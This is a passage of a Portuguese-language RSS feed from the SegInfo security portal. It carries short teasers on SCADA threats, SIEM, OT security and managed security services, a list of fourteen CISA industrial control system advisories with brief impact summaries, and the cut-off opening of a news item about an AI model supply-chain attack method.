<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="550" src="https://seginfo.com.br/wp-content/uploads/2025/10/Blog-capa-Ameacas-a-sistemas-SCADA-protegendo-infraestruturas-criticas_-1024x550.png" alt="" class="wp-image-73137" style="width:758px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/Blog-capa-Ameacas-a-sistemas-SCADA-protegendo-infraestruturas-criticas_-1024x550.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/10/Blog-capa-Ameacas-a-sistemas-SCADA-protegendo-infraestruturas-criticas_-300x161.png 300w, https://seginfo.com.br/wp-content/uploads/2025/10/Blog-capa-Ameacas-a-sistemas-SCADA-protegendo-infraestruturas-criticas_-150x81.png 150w, https://seginfo.com.br/wp-content/uploads/2025/10/Blog-capa-Ameacas-a-sistemas-SCADA-protegendo-infraestruturas-criticas_-768x412.png 768w, https://seginfo.com.br/wp-content/uploads/2025/10/Blog-capa-Ameacas-a-sistemas-SCADA-protegendo-infraestruturas-criticas_-894x480.png 894w, https://seginfo.com.br/wp-content/uploads/2025/10/Blog-capa-Ameacas-a-sistemas-SCADA-protegendo-infraestruturas-criticas_.png 1043w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Os sistemas de supervisão, controle e aquisição de dados (Supervisory Control And Data Acquisition, conhecidos como SCADA) são fundamentais para gerenciar e monitorar operações industriais em setores essenciais como energia, água, tráfego e manufatura. Sua função estratégica os torna a espinha dorsal de infraestruturas críticas em todo o mundo.<br><br>A integração dos sistemas SCADA com novas tecnologias trouxe ganhos de eficiência e conectividade, mas também introduziu vulnerabilidades críticas. Por seu papel central em processos sensíveis, qualquer falha ou brecha de segurança pode gerar consequências graves, com prejuízos imensuráveis tanto para organizações quanto para a sociedade.<br><br>Leia o artigo completo no<strong> <a href="https://clavis.com.br/ameacas-a-sistemas-scada/" target="_blank" rel="noreferrer noopener">blog da Clavis</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/10/02/ameacas-a-sistemas-scada-protegendo-infraestruturas-criticas/">Ameaças a sistemas SCADA: protegendo infraestruturas críticas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73135</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>O que é Security Consulting e como pode ajudar sua empresa?</title>
		<link>https://seginfo.com.br/2025/09/30/o-que-e-security-consulting-e-como-pode-ajudar-sua-empresa/</link>
		
		
		<pubDate>Tue, 30 Sep 2025 13:00:00 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73102</guid>

					<description><![CDATA[<p>A crescente complexidade do cenário de ameaças cibernéticas tem impulsionado empresas de todos os portes a buscar soluções especializadas para garantir a proteção de seus ativos digitais. Nesse contexto, o serviço de security consulting (ou consultoria em Segurança da Informação) surge como uma alternativa estratégica para identificar vulnerabilidades, mitigar riscos e alinhar a segurança às&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/09/30/o-que-e-security-consulting-e-como-pode-ajudar-sua-empresa/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/09/30/o-que-e-security-consulting-e-como-pode-ajudar-sua-empresa/">O que é Security Consulting e como pode ajudar sua empresa?</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="550" src="https://seginfo.com.br/wp-content/uploads/2025/10/imagem-blog-29.09.25-1024x550.png" alt="" class="wp-image-73106" style="width:798px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/imagem-blog-29.09.25-1024x550.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/10/imagem-blog-29.09.25-300x161.png 300w, https://seginfo.com.br/wp-content/uploads/2025/10/imagem-blog-29.09.25-150x81.png 150w, https://seginfo.com.br/wp-content/uploads/2025/10/imagem-blog-29.09.25-768x412.png 768w, https://seginfo.com.br/wp-content/uploads/2025/10/imagem-blog-29.09.25-894x480.png 894w, https://seginfo.com.br/wp-content/uploads/2025/10/imagem-blog-29.09.25.png 1043w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A crescente complexidade do cenário de ameaças cibernéticas tem impulsionado empresas de todos os portes a buscar soluções especializadas para garantir a proteção de seus ativos digitais.<br><br>Nesse contexto, o serviço de security consulting (ou consultoria em Segurança da Informação) surge como uma alternativa estratégica para identificar vulnerabilidades, mitigar riscos e alinhar a segurança às necessidades do negócio.<br><br>Leia o artigo completo no <a href="https://clavis.com.br/o-que-e-security-consulting/" target="_blank" rel="noreferrer noopener"><strong>blog da Clavis</strong></a>.</p>
<p>The post <a href="https://seginfo.com.br/2025/09/30/o-que-e-security-consulting-e-como-pode-ajudar-sua-empresa/">O que é Security Consulting e como pode ajudar sua empresa?</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73102</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>SegInfocast #90 – OT em pauta- cibersegurança além do digital</title>
		<link>https://seginfo.com.br/2025/09/25/seginfocast-90-ot-em-pauta-ciberseguranca-alem-do-digital/</link>
		
		
		<pubDate>Thu, 25 Sep 2025 18:53:00 +0000</pubDate>
				<category><![CDATA[Seginfo Podcast]]></category>
		<category><![CDATA[SegInfocast]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74317</guid>

					<description><![CDATA[<p>Seginfocast &#8211; Podcast em Segurança da Informação · SegInfocast #90 – OT em pauta- cibersegurança além do digital O SegInfocast está de volta, e o tema da vez é tecnologia operacional. Nosso CRO, Leonardo Pinheiro, recebeu dois especialistas que estão na linha de frente da proteção de infraestruturas críticas: Jarbas Carlos (coordenador de OT da&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/09/25/seginfocast-90-ot-em-pauta-ciberseguranca-alem-do-digital/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/09/25/seginfocast-90-ot-em-pauta-ciberseguranca-alem-do-digital/">SegInfocast #90 – OT em pauta- cibersegurança além do digital</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/soundcloud%253Atracks%253A2263698368&#038;color=%23ff5500&#038;auto_play=false&#038;hide_related=false&#038;show_comments=true&#038;show_user=true&#038;show_reposts=false&#038;show_teaser=true"></iframe><div style="font-size: 10px; color: #cccccc;line-break: anywhere;word-break: normal;overflow: hidden;white-space: nowrap;text-overflow: ellipsis; font-family: Interstate,Lucida Grande,Lucida Sans Unicode,Lucida Sans,Garuda,Verdana,Tahoma,sans-serif;font-weight: 100;"><a href="https://soundcloud.com/seginfocast" title="Seginfocast - Podcast em Segurança da Informação" target="_blank" style="color: #cccccc; text-decoration: none;">Seginfocast &#8211; Podcast em Segurança da Informação</a> · <a href="https://soundcloud.com/seginfocast/seginfocast-90-ot-em-pauta" title="SegInfocast #90 – OT em pauta- cibersegurança além do digital" target="_blank" style="color: #cccccc; text-decoration: none;">SegInfocast #90 – OT em pauta- cibersegurança além do digital</a></div>



<p class="wp-block-paragraph">O SegInfocast está de volta, e o tema da vez é tecnologia operacional. Nosso CRO, Leonardo Pinheiro, recebeu dois especialistas que estão na linha de frente da proteção de infraestruturas críticas: Jarbas Carlos (coordenador de OT da Clavis) e Ítalo Calvano (VP regional da Claroty na América Latina). Eles compartilharam insights valiosos sobre os riscos, soluções e o futuro da segurança em ambientes industriais.</p>



<p class="wp-block-paragraph">O papo foi direto ao ponto: ataques cada vez mais frequentes, maturidade no Brasil, Zero Trust em OT e como a união entre Clavis e Claroty tem gerado resultados concretos na prática. Um episódio essencial para quem atua com segurança e precisa tomar decisões que realmente impactam o negócio.</p>



<p class="wp-block-paragraph"></p>
<p>The post <a href="https://seginfo.com.br/2025/09/25/seginfocast-90-ot-em-pauta-ciberseguranca-alem-do-digital/">SegInfocast #90 – OT em pauta- cibersegurança além do digital</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74317</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Cibersegurança para veículos autônomos em frotas corporativas</title>
		<link>https://seginfo.com.br/2025/09/23/ciberseguranca-para-veiculos-autonomos-em-frotas-corporativas/</link>
		
		
		<pubDate>Tue, 23 Sep 2025 18:00:00 +0000</pubDate>
				<category><![CDATA[Artigos]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73028</guid>

					<description><![CDATA[<p>A mobilidade autônoma não é mais ficção científica: cada vez mais frotas corporativas estão investindo em veículos autônomos ou semi-autônomos, com automação, sensores, comunicação veículo‑a‑veículo (V2X) e softwares de controle que substituem ou complementam funcionalidades humanas. Com esse avanço, porém, surgem novos riscos  e a segurança cibernética passa a ser tão crítica quanto a engenharia&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/09/23/ciberseguranca-para-veiculos-autonomos-em-frotas-corporativas/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/09/23/ciberseguranca-para-veiculos-autonomos-em-frotas-corporativas/">Cibersegurança para veículos autônomos em frotas corporativas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="550" src="https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Veiculos-autonomos-Ciberseguranca-1024x550.png" alt="" class="wp-image-73031" srcset="https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Veiculos-autonomos-Ciberseguranca-1024x550.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Veiculos-autonomos-Ciberseguranca-300x161.png 300w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Veiculos-autonomos-Ciberseguranca-150x81.png 150w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Veiculos-autonomos-Ciberseguranca-768x412.png 768w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Veiculos-autonomos-Ciberseguranca-894x480.png 894w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Veiculos-autonomos-Ciberseguranca.png 1043w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A mobilidade autônoma não é mais ficção científica: cada vez mais frotas corporativas estão investindo em veículos autônomos ou semi-autônomos, com automação, sensores, comunicação veículo‑a‑veículo (V2X) e softwares de controle que substituem ou complementam funcionalidades humanas.<br><br>Com esse avanço, porém, surgem novos riscos  e a segurança cibernética passa a ser tão crítica quanto a engenharia de hardware. Empresas que operam frotas autônomas precisam entender como funcionam esses veículos, quais vulnerabilidades devem tratar e que normas regulatórias seguir, para operar de modo seguro e responsável.<br><br>Leia o artigo completo no <a href="https://clavis.com.br/ciberseguranca-para-veiculos-autonomos-em-frotas-corporativas/" target="_blank" rel="noreferrer noopener">blog da Clavis</a>.</p>
<p>The post <a href="https://seginfo.com.br/2025/09/23/ciberseguranca-para-veiculos-autonomos-em-frotas-corporativas/">Cibersegurança para veículos autônomos em frotas corporativas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73028</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Gerenciamento e Correlação de Eventos de Segurança (SIEM): o que é e suas funcionalidades</title>
		<link>https://seginfo.com.br/2025/09/18/gerenciamento-e-correlacao-de-eventos-de-seguranca-siem-o-que-e-e-suas-funcionalidades/</link>
		
		
		<pubDate>Thu, 18 Sep 2025 20:25:34 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=72972</guid>

					<description><![CDATA[<p>Em um cenário digital cada vez mais complexo, as empresas enfrentam o desafio constante de proteger seus ativos contra ameaças cibernéticas sofisticadas e persistentes.  O Gerenciamento e Correlação de Eventos de Segurança, conhecido como SIEM (Security Information and Event Management), surge como uma solução robusta e estratégica. Essa tecnologia permite às organizações monitorar, correlacionar e&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/09/18/gerenciamento-e-correlacao-de-eventos-de-seguranca-siem-o-que-e-e-suas-funcionalidades/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/09/18/gerenciamento-e-correlacao-de-eventos-de-seguranca-siem-o-que-e-e-suas-funcionalidades/">Gerenciamento e Correlação de Eventos de Segurança (SIEM): o que é e suas funcionalidades</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="550" src="https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Gerenciamento-e-Correlacao-de-Eventos-de-Seguranca-SIEM-1024x550.png" alt="" class="wp-image-72973" style="width:734px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Gerenciamento-e-Correlacao-de-Eventos-de-Seguranca-SIEM-1024x550.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Gerenciamento-e-Correlacao-de-Eventos-de-Seguranca-SIEM-300x161.png 300w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Gerenciamento-e-Correlacao-de-Eventos-de-Seguranca-SIEM-150x81.png 150w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Gerenciamento-e-Correlacao-de-Eventos-de-Seguranca-SIEM-768x412.png 768w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Gerenciamento-e-Correlacao-de-Eventos-de-Seguranca-SIEM-894x480.png 894w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-Gerenciamento-e-Correlacao-de-Eventos-de-Seguranca-SIEM.png 1043w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Em um cenário digital cada vez mais complexo, as empresas enfrentam o desafio constante de proteger seus ativos contra ameaças cibernéticas sofisticadas e persistentes. <br><br>O Gerenciamento e Correlação de Eventos de Segurança, conhecido como SIEM (Security Information and Event Management), surge como uma solução robusta e estratégica. Essa tecnologia permite às organizações monitorar, correlacionar e responder a incidentes com maior agilidade e inteligência, oferecendo uma visão centralizada e analítica da postura de segurança da empresa.<br><br>Leia o artigo completo no <strong><a href="https://clavis.com.br/o-que-e-siem/" target="_blank" rel="noreferrer noopener">Blog da Clavis</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/09/18/gerenciamento-e-correlacao-de-eventos-de-seguranca-siem-o-que-e-e-suas-funcionalidades/">Gerenciamento e Correlação de Eventos de Segurança (SIEM): o que é e suas funcionalidades</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">72972</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>CISA divulga 14 novos avisos de segurança para sistemas de controle industrial</title>
		<link>https://seginfo.com.br/2025/09/18/cisa-divulga-14-novos-avisos-de-seguranca-para-sistemas-de-controle-industrial/</link>
		
		
		<pubDate>Thu, 18 Sep 2025 19:30:27 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=72961</guid>

					<description><![CDATA[<p>A Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA) publicou, em 9 de setembro de 2025, 14 novos avisos de segurança voltados para Sistemas de Controle Industrial (ICS). Esses documentos têm como objetivo alertar sobre vulnerabilidades críticas, falhas de segurança e possíveis explorações que afetam diferentes fabricantes e soluções utilizadas em ambientes industriais.&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/09/18/cisa-divulga-14-novos-avisos-de-seguranca-para-sistemas-de-controle-industrial/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/09/18/cisa-divulga-14-novos-avisos-de-seguranca-para-sistemas-de-controle-industrial/">CISA divulga 14 novos avisos de segurança para sistemas de controle industrial</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="546" src="https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_593167445-1536x819-1-1024x546.webp" alt="" class="wp-image-72967" style="width:740px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_593167445-1536x819-1-1024x546.webp 1024w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_593167445-1536x819-1-300x160.webp 300w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_593167445-1536x819-1-150x80.webp 150w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_593167445-1536x819-1-768x410.webp 768w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_593167445-1536x819-1-1170x624.webp 1170w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_593167445-1536x819-1-900x480.webp 900w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_593167445-1536x819-1.webp 1536w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A <strong>Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA)</strong> publicou, em 9 de setembro de 2025, <strong>14 novos avisos de segurança</strong> voltados para <strong>Sistemas de Controle Industrial (ICS)</strong>. Esses documentos têm como objetivo alertar sobre vulnerabilidades críticas, falhas de segurança e possíveis explorações que afetam diferentes fabricantes e soluções utilizadas em ambientes industriais.</p>



<p class="wp-block-paragraph">A seguir, destacamos os avisos e seus respectivos impactos:</p>



<h2 class="wp-block-heading" id="h-principais-avisos-publicados-pela-cisa">Principais avisos publicados pela CISA</h2>



<ul class="wp-block-list">
<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-252-01" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-252-01 Rockwell Automation ThinManager</strong><br></a>Falhas no ThinManager podem permitir que atacantes obtenham acesso não autorizado a recursos críticos de visualização e gerenciamento de terminais.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-252-02" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-252-02 ABB Cylon Aspect BMS/BAS</strong><br></a>Vulnerabilidades no sistema de gerenciamento predial da ABB podem expor infraestruturas de automação predial a riscos de acesso indevido e manipulação de dados.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-252-03" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-252-03 Rockwell Automation Stratix IOS</strong><br></a>Problemas no sistema operacional dos switches Stratix podem abrir portas para execução remota de código e interrupção da rede industrial.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-252-04" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-252-04 Rockwell Automation FactoryTalk Optix</strong><br></a>Falhas no software de visualização podem comprometer a integridade de aplicações SCADA, permitindo manipulação indevida de dados de monitoramento.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-252-05" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-252-05 Rockwell Automation FactoryTalk Activation Manager</strong><br></a>Vulnerabilidades nesse gerenciador de licenciamento podem facilitar ataques de escalonamento de privilégios.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-252-06" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-252-06 Rockwell Automation CompactLogix® 5480</strong><br></a>Questões de segurança nos controladores CompactLogix podem afetar a disponibilidade e a confiabilidade de processos industriais.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-252-07" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-252-07 Rockwell Automation ControlLogix 5580</strong><br></a>Falhas semelhantes também foram identificadas nos controladores ControlLogix, impactando o desempenho de operações críticas.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-252-08" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-252-08 Rockwell Automation Analytics LogixAI</strong><br></a>Problemas no módulo de análise baseado em IA podem permitir a extração de informações sensíveis ou adulteração de dados.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-252-09" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-252-09 Rockwell Automation 1783-NATR</strong><br></a>Vulnerabilidades no dispositivo de tradução de endereços de rede podem ser exploradas para contornar controles de segmentação.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-296-01" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-24-296-01 Mitsubishi Electric Iconics Digital Solutions e outros produtos (Update A)</strong><br></a>Atualização de aviso anterior, reforçando falhas que impactam soluções digitais e produtos da Mitsubishi Electric.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-058-01" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-058-01 Schneider Electric Módulos de comunicação para Modicon M580 e Quantum (Update B)</strong><br></a>Problemas de comunicação nesses módulos podem resultar em interceptação ou manipulação de dados entre controladores industriais.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-219-07" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-219-07 EG4 Electronics EG4 Inverters (Update B)</strong><br></a>Atualização para falhas em inversores da EG4 que podem afetar operações de energia renovável e geração elétrica.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-233-01" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-233-01 Mitsubishi Electric MELSEC iQ-F CPU Module (Update A)</strong><br></a>Atualização sobre vulnerabilidades em módulos de CPU da série MELSEC iQ-F, que controlam processos industriais de automação.</li>



<li><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-226-31" target="_blank" rel="noreferrer noopener nofollow"><strong>ICSA-25-226-31 Rockwell Automation 1756-ENT2R, 1756-EN4TR, 1756-EN4TRXT (Update A)</strong><br></a>Atualização referente a falhas em módulos de comunicação da Rockwell, impactando a resiliência da conectividade industrial.</li>
</ul>



<h2 class="wp-block-heading" id="h-recomendacoes-da-cisa">Recomendações da CISA</h2>



<p class="wp-block-paragraph">A CISA <strong>recomenda que administradores e equipes de segurança</strong> revisem imediatamente os avisos técnicos completos, apliquem as <strong>correções e medidas de mitigação sugeridas</strong>, e avaliem o impacto potencial em seus ambientes.</p>



<p class="wp-block-paragraph">A publicação desses avisos reforça a importância de <strong>monitorar continuamente vulnerabilidades em ICS</strong> e de aplicar práticas robustas de <strong>gestão de patches e segurança operacional</strong> para proteger infraestruturas críticas.</p>



<p class="wp-block-paragraph">Para saber mais, <strong><a href="https://www.cisa.gov/news-events/alerts/2025/09/09/cisa-releases-fourteen-industrial-control-systems-advisories" target="_blank" rel="noreferrer noopener nofollow">clique aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/09/18/cisa-divulga-14-novos-avisos-de-seguranca-para-sistemas-de-controle-industrial/">CISA divulga 14 novos avisos de segurança para sistemas de controle industrial</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">72961</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>MSS como estratégia de negócio: por que sua empresa precisa contar com um serviço gerenciado de Segurança da Informação</title>
		<link>https://seginfo.com.br/2025/09/15/mss-como-estrategia-de-negocio-por-que-sua-empresa-precisa-contar-com-um-servico-gerenciado-de-seguranca-da-informacao/</link>
		
		
		<pubDate>Mon, 15 Sep 2025 20:45:50 +0000</pubDate>
				<category><![CDATA[Artigos]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=72941</guid>

					<description><![CDATA[<p>O cenário atual da Segurança da Informação é, ao mesmo tempo, complexo e desafiador. Com o avanço das tecnologias digitais, a superfície de ataque das organizações se expandiu significativamente — e, com ela, o número de vulnerabilidades e riscos. A falta de mão de obra qualificada tem sido constantemente apontada como uma das principais barreiras&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/09/15/mss-como-estrategia-de-negocio-por-que-sua-empresa-precisa-contar-com-um-servico-gerenciado-de-seguranca-da-informacao/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/09/15/mss-como-estrategia-de-negocio-por-que-sua-empresa-precisa-contar-com-um-servico-gerenciado-de-seguranca-da-informacao/">MSS como estratégia de negócio: por que sua empresa precisa contar com um serviço gerenciado de Segurança da Informação</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<ul class="wp-block-list">
<li><a href="https://clavis.com.br/2025/09/15/"></a></li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="550" src="https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-MSS-como-estrategia-de-negocio-SET-2025-1024x550.png" alt="" class="wp-image-72942" style="width:766px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-MSS-como-estrategia-de-negocio-SET-2025-1024x550.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-MSS-como-estrategia-de-negocio-SET-2025-300x161.png 300w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-MSS-como-estrategia-de-negocio-SET-2025-150x81.png 150w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-MSS-como-estrategia-de-negocio-SET-2025-768x412.png 768w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-MSS-como-estrategia-de-negocio-SET-2025-894x480.png 894w, https://seginfo.com.br/wp-content/uploads/2025/09/Blog-capa-MSS-como-estrategia-de-negocio-SET-2025.png 1043w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O cenário atual da Segurança da Informação é, ao mesmo tempo, complexo e desafiador. Com o avanço das tecnologias digitais, a superfície de ataque das organizações se expandiu significativamente — e, com ela, o número de vulnerabilidades e riscos.<br><br>A falta de mão de obra qualificada tem sido constantemente apontada como uma das principais barreiras para uma gestão eficaz da Segurança da Informação. Além disso, a retenção de talentos na área é um desafio recorrente: altos índices de rotatividade e escassez de profissionais experientes dificultam a continuidade e a maturidade dos programas de segurança.<br><br>Leia o artigo completo no blog da Clavis:<br><a href="https://clavis.com.br/mss-como-estrategia-de-negocio/" target="_blank" rel="noreferrer noopener">https://clavis.com.br/mss-como-estrategia-de-negocio/</a></p>
<p>The post <a href="https://seginfo.com.br/2025/09/15/mss-como-estrategia-de-negocio-por-que-sua-empresa-precisa-contar-com-um-servico-gerenciado-de-seguranca-da-informacao/">MSS como estratégia de negócio: por que sua empresa precisa contar com um serviço gerenciado de Segurança da Informação</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">72941</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Novo método de ataque à cadeia de suprimentos de IA é demonstrado contra produtos do Google e Microsoft</title>
		<link>https://seginfo.com.br/2025/09/05/novo-metodo-de-ataque-a-cadeia-de-suprimentos-de-ia-e-demonstrado-contra-produtos-do-google-e-microsoft/</link>
		
		
		<pubDate>Fri, 05 Sep 2025 19:40:24 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=72839</guid>

					<description><![CDATA[<p>Pesquisadores da Palo Alto Networks revelaram um novo método de ataque que representa um risco significativo para a cadeia de suprimentos de inteligência artificial (IA). A técnica, batizada de Model Namespace Reuse, foi demonstrada com impacto em produtos da Microsoft e Google, além de expor riscos potenciais para projetos de código aberto. Como funciona o&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/09/05/novo-metodo-de-ataque-a-cadeia-de-suprimentos-de-ia-e-demonstrado-contra-produtos-do-google-e-microsoft/">Read More</a></span></p>
